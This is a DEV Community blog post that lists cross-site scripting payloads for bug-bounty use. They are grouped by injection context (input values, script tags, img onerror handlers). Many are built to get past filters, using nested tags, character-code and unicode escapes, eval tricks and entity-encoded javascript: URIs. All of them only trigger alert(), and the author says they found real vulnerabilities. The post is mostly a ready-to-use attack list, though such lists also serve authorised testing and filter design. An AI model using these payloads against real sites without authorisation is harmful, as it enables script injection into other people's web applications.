DEV Community

Cover image for Useful XSS Payloads
vala broumand
vala broumand

Posted on

4

Useful XSS Payloads

#cybersecurity #security #web3

In this post i will show top and useful xss payloads in 2022. i found xss vulnerabilities in many web apps with some of them below.

You can use payloads below when you are dealing with a injection that goes inside the value of a input:

\"-alert(1)//
\'-alert(1)//
%26apos;-alert(1)-%26apos
'-alert(1)-'
Enter fullscreen mode Exit fullscreen mode

Use these payloads when you are injecting inside a script tag

</script><img/src/onerror=alert(1)>
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
Enter fullscreen mode Exit fullscreen mode

And we have some common payloads here

// Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">

// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
Enter fullscreen mode Exit fullscreen mode

Find Security and Bug Bounty Books in my telegram channel ==>

t.me

profile
Sentry
 Promoted

Sentry image

Hands-on debugging session: instrument, monitor, and fix

Join Lazar for a hands-on session where you’ll build it, break it, debug it, and fix it. You’ll set up Sentry, track errors, use Session Replay and Tracing, and leverage some good ol’ AI to find and fix issues fast.

RSVP here →

Top comments (0)

profile
Heroku
 Promoted

Heroku

Simplify your DevOps and maximize your time.

Since 2007, Heroku has been the go-to platform for developers as it monitors uptime, performance, and infrastructure concerns, allowing you to focus on writing code.

Learn More

Read next

mikeyoung44 profile image

Why Current AI Text Style Transfer Metrics Fall Short - New Study Shows Major Flaws in Automated Evaluation Methods

Mike Young -

mikeyoung44 profile image

AI Creates Ultra-Realistic Rain in Photos Using Graphics Rendering and Neural Networks

Mike Young -

mikeyoung44 profile image

AI Model Achieves Record-Breaking Math Performance with 1.8M Problem Dataset and New Verification System

Mike Young -

godofgeeks profile image

NAT and Port Forwarding

Aviral Srivastava -

👋 Kindness is contagious

Please leave a ❤️ or a friendly comment on this post if you found it helpful!

Okay